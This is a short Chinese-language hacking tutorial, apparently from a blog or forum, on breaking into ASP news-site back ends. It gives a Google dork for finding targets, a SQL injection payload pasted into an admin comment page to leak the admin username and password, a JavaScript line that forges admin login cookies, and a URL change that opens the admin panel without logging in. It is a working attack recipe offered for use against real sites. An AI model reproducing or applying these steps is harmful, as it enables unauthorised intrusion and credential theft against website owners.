在谷歌里搜索:inurl:news_more.asp?lm2=搜索到如下站点:http://www.*********/news_more.asp?lm2=1691.将“/news_more.asp?
.
在谷歌里搜索:inurl:news_more.asp?lm2=
搜索到如下站点:http://www.*********/news_more.asp?lm2=169
1.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”
2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内,修改保存。
3.
将 alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代码拷贝进浏览器,回车;(注:标红1处填上图中1内容,2处填上图中2内容)
点击确定。
点击确定。
5.将地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回车,即可不用登录直接进入后台了。如图,
.
